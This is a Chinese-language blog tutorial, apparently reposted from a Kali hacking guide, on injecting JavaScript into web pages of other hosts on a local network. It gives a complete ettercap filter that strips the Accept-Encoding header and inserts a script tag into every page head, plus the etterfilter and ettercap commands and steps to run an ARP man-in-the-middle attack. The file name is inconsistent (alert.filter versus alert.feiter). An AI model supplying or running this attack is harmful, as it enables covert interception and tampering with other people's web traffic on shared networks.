路由攻击之javascript注入

Posted kali黑客教学

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了路由攻击之javascript注入相关的知识,希望对你有一定的参考价值。


路由攻击之javascript注入

所需工具

1.kali linux2.0

2.js脚本代码

图文教程

复制下面代码,在记事本中另存为alert.filter(文件保存类型为所有文件)

if (ip.proto == TCP && tcp.dst == 80) {

if (search(DATA.data, "Accept-Encoding")) {

replace("Accept-Encoding", "Accept-Rubbish!");

# note: replacement string is same length as original string

#msg("zapped Accept-Encoding!\n");

}

}

if (ip.proto == TCP && tcp.src == 80) {

replace("<head>", "<head><script type="text/javascript">alert('你好美女');</script>");

replace("<HEAD>", "<HEAD><script type="text/javascript">alert('你好美女');</script>");

msg("注入成功!!\n");

}

将文件载入kali linux中


分别执行下面命令

1. cd /root/桌面                     //载入桌面

2.ls                                          //查看桌面文件

3. etterfilter alert.feiter -o 11.ef   //将alert.feiter编码为可执行的11.ef

alert.feiter和11.ef文件名可自定义


完成后桌面会生成11.ef文件

4.命令ettercap -G运行程序

5.现在对ettercap进行设置

这里选择网卡

注意:攻击的主机必须和你在同一局域网内


开始扫描主机列表

加入攻击(按照顺序走1-2-3-4不要乱哦

效果:

选择中间人攻击

勾选

载入刚才生成的11.ef文件

有错误提示不要理会

开始攻击

效果


注意事项
1
编码问题;

在linux中由于编码问题,在输入汉字的时候会乱码,我尝试着对js脚本进行了编码处理,但还是显示乱码,所有有能解决这一问题的,和我联系共同讨论。(QQ;914101530)

获取更多远程教程扫码关注更多精彩




以上是关于路由攻击之javascript注入的主要内容,如果未能解决你的问题,请参考以下文章

Web 攻击之 XSS 攻击及防御策略

为啥这种 javascript 注入攻击不起作用? [复制]

如何防止用户生成的 HTML 中的 Javascript 注入攻击

第三天--注入攻击:Web安全之SQL注入漏洞专题

SQL注入攻击之sqlmap

WEB安全之注入攻击